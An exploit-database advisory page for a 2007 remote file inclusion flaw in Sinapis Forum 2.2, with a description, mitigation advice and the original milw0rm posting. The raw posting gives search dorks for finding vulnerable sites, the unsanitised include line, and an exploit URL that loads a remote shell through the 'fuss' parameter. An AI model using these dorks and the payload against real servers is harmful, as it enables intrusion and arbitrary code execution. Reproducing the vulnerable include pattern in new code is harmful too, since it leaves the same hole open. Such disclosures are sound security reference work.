header-logo
Suggest Exploit
vendor:
Sinapis Forum
by:
kezzap66345
8.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: Sinapis Forum
Affected Version From: Sinapis Forum 2.2
Affected Version To: Sinapis Forum 2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sinapis Forum 2.2 RFI Vulnerability

The Sinapis Forum 2.2 script is vulnerable to Remote File Inclusion (RFI) attack. An attacker can exploit this vulnerability by injecting a malicious file path in the 'fuss' parameter of the sinapis.php file, which can lead to arbitrary code execution on the server.

Mitigation:

The vendor should release a patch to fix the RFI vulnerability. In the meantime, users are advised to restrict access to the sinapis.php file and sanitize user input to prevent RFI attacks.
Source

Exploit-DB raw data:

Sinapis Forum 2.2

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumGästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="Sinapis by scripter.ch"
Dork1="inurl:sinapis.php"
*****************
ERROR:
if($fuss != ""){include($fuss);}      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinapis.php?fuss=[SHELL]

# milw0rm.com [2007-02-23]